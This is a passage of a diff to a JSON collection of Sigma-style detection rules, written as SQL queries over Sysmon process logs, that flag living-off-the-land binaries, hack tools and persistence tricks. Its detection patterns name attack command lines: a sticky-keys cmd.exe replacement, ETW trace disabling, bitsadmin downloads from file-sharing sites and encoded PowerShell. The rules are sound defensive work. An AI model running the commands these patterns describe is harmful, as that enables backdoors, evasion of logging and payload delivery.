"proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": 
"proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Legitimate installation of a new screensaver" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", 
"status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_remote_access_tools_logmein.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth 
(Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR 
CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_taidoor.yml" - }, - { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR 
CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE 
'\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" - ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" - }, - { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", - "status": "experimental", - "description": 
"Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], + "filename": "proc_creation_win_hktl_koadic.yml" + }, + { + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "status": "experimental", + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download 
payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], "falsepositives": [ - "Legitimate event consumers", - "Dell 
computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' 